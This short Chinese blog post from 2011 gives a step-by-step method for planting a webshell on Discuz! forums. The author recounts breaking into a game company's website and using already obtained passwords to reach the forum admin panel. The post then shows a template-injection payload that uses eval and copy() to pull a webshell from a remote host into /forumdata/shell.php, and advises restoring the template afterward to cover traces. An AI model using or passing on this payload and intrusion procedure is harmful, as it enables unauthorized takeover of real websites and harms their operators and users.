分类: Mysql/postgreSQL
2011-11-16 23:06:16
Discuz!的最新拿Webshell法,测试可行
无意中入侵了游戏官方网站,可拿不到Webshell,郁闷中发现里面有个Discuz!论坛,马上根据已经拿到的密码社工,呵呵,居然成功进入后台!可是毕竟是6.0+的版本(管理员把版权去掉了),网上众所周知的编辑模板(模板编辑功能受限)办法来拿SHELL很是不爽,想起来编辑任意模板文件,然后eval出SHELL的方法,终于搞定!下面就是方法的实现步骤:
目前通吃所有DZ版本。
1. 随便选一模板文件,选择编辑
2. 找一个空间上传一个webshell, 假定其地址为
3. 在任意位置输入:
{eval copy(‘’, DISCUZ_ROOT.’./forumdata/shell.php’);}
4. 保存, 刷新
5. 访问该模板所属的文件
6. 把模板恢复原样
大功告成, 访问/forumdata/shell.php便是你的马马